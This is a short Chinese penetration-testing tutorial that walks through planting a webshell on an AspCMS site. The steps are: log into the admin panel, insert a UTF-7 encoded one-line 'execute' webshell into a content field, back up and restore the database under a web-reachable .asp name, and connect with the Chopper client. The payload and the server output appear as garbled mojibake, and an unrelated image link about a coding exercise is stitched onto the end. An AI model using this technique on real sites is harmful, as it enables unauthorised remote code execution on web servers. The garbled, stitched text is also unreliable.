文章目录
- 渗透测试-地基篇-Webshell-Aspcms框架(十)
- 一、登录演示
- 二、数据库备份拿webshell
一、登录演示
本次演示一种方法思路拿aspcms框架的webshell,该页面是用的是最新版本的aspcms框架自行搭建演示的。
1)登录地址:http://www.aspcms.com/admin_aspcms/
2)登录后的页面:
二、数据库备份拿webshell
登录到扩展功能-数据库备份恢复:
首先打开内容维护中栏目都可以插入一句话,修改即可:
插入utf7一句话:
uft7 一句话┼攠數畣整爠煥敵瑳∨≡┩愾
然后开始备份数据库:
在点击恢复此备份:
aspcms默认的这个数据库名是:#5Dp8Gh.asp改为%235Dp8Gh.asp
访问:http://www.aspcms.com/data/%235Dp8Gh.asp
在内容中出现:ÀàÐͲ»Æ¥Åä: 'execute’表示写入一句话
成功利用caidao连接:
![[CareerCup] 9.6 Generate Parentheses 生成括号](http://pic.xiahunao.cn/[CareerCup] 9.6 Generate Parentheses 生成括号)
